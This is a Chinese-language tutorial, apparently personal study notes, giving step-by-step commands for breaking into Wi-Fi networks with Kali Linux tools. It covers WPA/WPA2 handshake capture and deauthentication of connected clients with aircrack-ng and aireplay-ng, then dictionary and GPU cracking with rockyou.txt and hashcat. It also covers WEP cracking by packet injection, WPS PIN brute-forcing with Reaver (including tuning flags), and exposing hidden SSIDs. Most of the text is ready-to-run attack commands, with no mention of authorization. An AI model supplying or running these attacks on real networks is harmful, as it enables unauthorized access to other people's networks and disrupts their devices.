Wifi破解

当时学习破解wifi遇到不少问题，这里把遇到的问题总结一下，并综合了网上的讲解，如有不对之处还请指出。

现在的wifi一般加密都是：

1、不启用安全‍‍‍‍2、WEP‍‍‍‍

3、WPA/WPA2-PSK（预共享密钥）‍‍‍‍

4、WPA/WPA2 802.1X （radius认证）

============================================================

=====失败的话要检查是否是没有安装网卡驱动：

RTL8188cus开启监听模式

http://www.findspace.name/easycoding/1498

============================================================

使用前需要使用：

输入”iwconfig”来显示当前无线接口状态

airmon-ng <check|check kill>

< check|check kill > “check”会将所有影响到aircrack-ng工作的进程罗列出来，强烈推荐使用aircrack-ng套装的时候停掉这些进程。”check kill”会罗列并杀死影响aircrack-ng的进程。

在开启monitor模式之前，需要关闭network managers

关闭monitor模式：airmon-ng stop wlan0mon

重启network manager：service network-manager start

=============================================================

(wpa/wpa2)破解

第一步

查看网卡信息：

# airmon-ng

第二步

监听窗口：

#airmon-ng start wlan0

执行成功之后网卡接口变为wlan0mon

第三步

扫描wifi信号：

#airodump-ng wlan0mon

上面列出了周围的wifi和它们的详细信息，包括信号强度、加密类型、频道等。要记住要破解wifi的频道号和BSSID

第四步

抓取握手包：

#airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 -w ~/ wlan0mon

参数解释：

-c指定频道号

–bssid指定路由器bssid

-w指定抓取的数据包保存位置

第五步

强制连接到wifi的设备重新连接路由器：

aireplay-ng的工具，它可以强制用户断开wifi连接。原理是，给连接到wifi的一个设备发送一个deauth（反认证）包，让那个设备断开wifi，随后它自然会再次连接wifi。

aireplay-ng的生效前提是，wifi网络中至少有一个连接的设备。从上图(4)可以看到哪些设备连接到了wifi，STATION就是连接设备的MAC地址，记住一个。

C8:3A:35:30:3E:C8 是路由器MAC地址

B8:E8:56:09:CC:9C 是客户端MAC地址

打开新终端执行：

# aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon

参数解释：

-0表示发起deauthentication攻击

-a指定无线路由器BSSID

-c指定强制断开的设备

第六步

如果成功可以结束并抓获握手包

# airmon-ng stop wlan0mon

第七步

破解密码：

# aircrack-ng -a2 -b C8:3A:35:30:3E:C8 -w /usr/share/wordlists/rockyou.txt ~/*.cap

参数解释：

-a2代表WPA的握手包

-b指定要破解的wifi BSSID。

-w指定字典文件

最后是抓取的包

第八步（可选）（树莓派不行）

使用显卡的运算能力：

Hashcat可以借助GPU的运算力破解各种不同算法的hash值

破解cap文件之前，要把它转换为hccap文件

# aircrack-ng file.cap -J out.hccap

使用GPU破解hash：

# hashcat -m 2500 out.hccap 字典文件

===================================================================

Kali Linux破解wifi密码(WEP)

前四步同上

第五步

加快Beacons和Data数据的收集速度：

和破解WPA/WPA2不同的是，它只要抓取到足够的Beacons和Data数据就可以破解，理想情况下是100000+。你可以等，也可以使用aireplay加快这个进程。

# aireplay-ng -1 0 -a C8:3A:35:30:3E:C8 wlan0mon

# aireplay-ng -3 -b C8:3A:35:30:3E:C8 wlan0mon

抓取足够多的包就可以停止。

第六步

破解密码：

# aircrack-ng ~/*.cap

最后，不要忘了结束无线网卡的监控模式：

# airmon-ng stop wlan0mon

======================================================

使用Reaver破解开启了WPS功能的wifi密码(wpa/wpa2)

Wi-Fi保护设置（简称WPS，全称Wi-Fi Protected Setup）是一个无线网络安全标准，旨在让家庭用户使用无线网络时简化加密步骤。此标准由Wi-Fi联盟（Wi-Fi Alliance）于2006年制定。

WPS的目的是简化用户输入密码的步骤；在某个设备连接wifi，需要输入密码时，只要按一下无线路由器上的wps按钮就可以了。

WPS的pin码并没有加密。Reaver会暴力破解pin码，找到pin码也就找到了密码。一般用时也不短。

注意：

网卡支持数据包注入，一般笔记本不支持

要求无线信号强

如果发送pin码过快，有可能造成路由器崩溃；就类似对服务器的DDOS攻击。

Reaver有很多选项，我只使用最基本的选项，你也许需要根据情况使用其他选项。查看帮助：reaver ?

前三步同上，打开无线网卡的的监控模式。

第四步

找到开启WPS功能的无线路由器：

# wash -i wlan0mon -C

如果什么也没有表示周围没有开启WPS的无线路由器。记住要破解wifi的BSSID。

第五步

开始破解密码：

# reaver -i wlan0mon -b C8:3A:35:30:3E:C8 -vv -a

reaver命令参数(转):

-i 监听后接口名称

-b 目标mac地址

-a 自动检测目标AP最佳配置

-S 使用最小的DH key（可以提高PJ速度）

-vv 显示更多的非严重警告

-d  即delay每穷举一次的闲置时间 预设为1秒

-t  即timeout每次穷举等待反馈的最长时间

-c  指定频道可以方便找到信号，如-c1 指定1频道，大家查看自己的目标频道做相应修改 （非TP-LINK路由推荐–d9 –t9  参数防止路由僵死

目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1

目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1

目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

等待2-10小时：

最后，不要忘了结束无线网卡的监控模式：

# airmon-ng stop wlan0mon

=====================================================================

隐藏SSID解决

隐藏SSID就是把你老大的AP隐藏起来，不让别人搜索到。请注意，这样的话，在连接wifi时就要手动输入AP名。

只看到了 length 12，没有ap名。

查看方法：

# airodump-ng -c 6 --bssid C8:3A:35:30:3E:C8 wlan0mon

# aireplay-ng -0 30 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon

破解密码的方法不变；使用上面两个命令就可以轻松得到ap名。